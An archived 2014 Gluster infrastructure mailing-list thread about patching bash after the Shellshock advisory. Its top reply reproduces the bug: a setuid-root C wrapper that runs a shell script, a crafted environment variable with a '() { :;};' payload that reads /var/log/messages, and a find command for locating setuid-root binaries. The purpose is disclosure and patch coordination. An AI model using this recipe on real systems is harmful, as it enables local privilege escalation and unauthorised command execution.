[Gluster-infra] Updates to Gluster Infra boxen required

Dan Lambright dlambrig at redhat.com
Thu Sep 25 13:26:02 UTC 2014 

I was able to reproduce the BASH security hole with the recipe below. It seems like a very significant problem.


---

// Create a file runscript.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
   setuid( 0 );
   system( "/usr/local/bin/test.sh");
   return 0;
}

// Compile it

gcc runscript.c -o runscript

// Make it owned by root, and set the setuid bit so anyone who runs it will have root privs.

sudo chown root:root runscript
sudo chmod 4755 runscript

// Now make an empty script.

sudo touch /usr/local/bin/test.sh

// So if a hacker was able to find a program with "runscript's" characteristics, this would be enough to take over a system: Any program owned by root with the sutuid bit set that also happens to spawn off a shell. [1] lists some.

To demonstrate, make an environment variable that contains arbitrary code. It will be executed whenever "runscript" is run.
 
declare -x var='() { :;}; /usr/bin/tail -n 5 /var/log/messages'

// as a non privileged user, you will be able to see the contents of /var/log/messages.
// You could put any command into the environment variable "var".

// To find what files have setgid : 

find directory -user root -perm -4000 -exec ls -ldb {} \;

[1]
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ 

----- Original Message -----
> From: "Luis Pabón" <lpabon at redhat.com>
> To: "Justin Clift" <justin at gluster.org>, "Harshavardhana" <harsha at harshavardhana.net>, "Emmanuel Dreyfus"
> <manu at netbsd.org>, "Michael Scherer" <mscherer at redhat.com>, "Louis Zuckerman" <me at louiszuckerman.com>
> Cc: "Gluster Infra" <gluster-infra at gluster.org>
> Sent: Thursday, September 25, 2014 6:43:36 AM
> Subject: Re: [Gluster-infra] Updates to Gluster Infra boxen required
> 
> Sure, I'll take care of those systems.
> 
> - Luis
> 
> On 09/24/2014 11:12 AM, Justin Clift wrote:
> > Hi guys,
> >
> > In light of this, bash needs to be updated across all of our infrastructure
> > boxes (including the various slave VMs):
> >
> >    https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
> >
> > I'll take care of:
> >
> >    * the slave2*.cloud.gluster.org VM's
> >    * www.gluster.org
> >    * download.gluster.org
> >    * review.gluster.org
> >    * build.gluster.org
> >    * engg.gluster.com
> >    * backups.cloud.gluster.org
> >    * staging.gluster.org
> >
> > Harsha, are you ok to update the freebsd0 VM?
> > Manu, ditto for the netbsd ones?
> > Louis, same for gluster-sonar?
> > Misc, same for salt-master.gluster.org?
> >
> > Luis, these are yours aren't they?  If so, would you ok
> > to double check that they're ok?
> >
> >    * g4s-rackspace-el6-1
> >    * g4s-rackspace-f19-1
> >    * g4s-rackspace-f19-3
> >    * g4s-rackspace-f19-4
> >    * gfs-rackspace-f20-1
> >    * tiny-rackspace-f20-1
> >    * gluster-swift2
> >
> > Regards and best wishes,
> >
> > Justin Clift
> >
> > --
> > GlusterFS - http://www.gluster.org
> >
> > An open source, distributed file system scaling to several
> > petabytes, and handling thousands of clients.
> >
> > My personal twitter: twitter.com/realjustinclift
> >
> 
> _______________________________________________
> Gluster-infra mailing list
> Gluster-infra at gluster.org
> http://www.gluster.org/mailman/listinfo/gluster-infra
>

More information about the Gluster-infra mailing list